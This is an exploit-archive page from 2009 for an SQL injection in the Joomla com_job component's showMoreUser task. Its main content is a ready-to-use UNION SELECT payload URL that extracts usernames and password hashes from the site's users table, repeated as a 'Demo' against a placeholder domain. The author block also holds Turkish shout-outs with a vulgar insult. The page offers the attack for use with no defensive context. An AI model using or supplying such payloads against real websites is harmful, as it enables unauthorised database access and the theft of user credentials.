[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_job ( showMoreUse) SQL injection vulnerability
# Published : 2009-12-08
# Author : Palyo34
# Previous Title : Viscacha 0.8 Gold persistant XSS vulnerability
# Next Title : Alqatari group Version 1.0 <== 5.0 (id) Remote SQL Injection Vulnerability


/************************************************************************** 
  
[!] Joomla Component com_job ( showMoreUse) SQL injection vulnerability 
[!] Author  : Palyo34  
[!] Homepage: http://www.1923turk.biz
[!] Date    : 12 08, 2009  
  
**************************************************************************/ 
[+] Manas58
[+] Topunuzun a.q 
[+] aponun picleri 
[+] 
[+] 
[+] 7 KAHRAMAN &#64257;EH?D?M?Z? SAYGIYLA ANIYORUZ ALLAH RAHMET EYLES?N  

  

  
  
=========================================================================== 
  
 
  
http://server/index.php?option=com_job&task=showMoreUser&id=[SQL] 
  
[ Exploit ] 
  
index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--

[ Demo ]

http://www.site.com/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users--
  
  
===========================================================================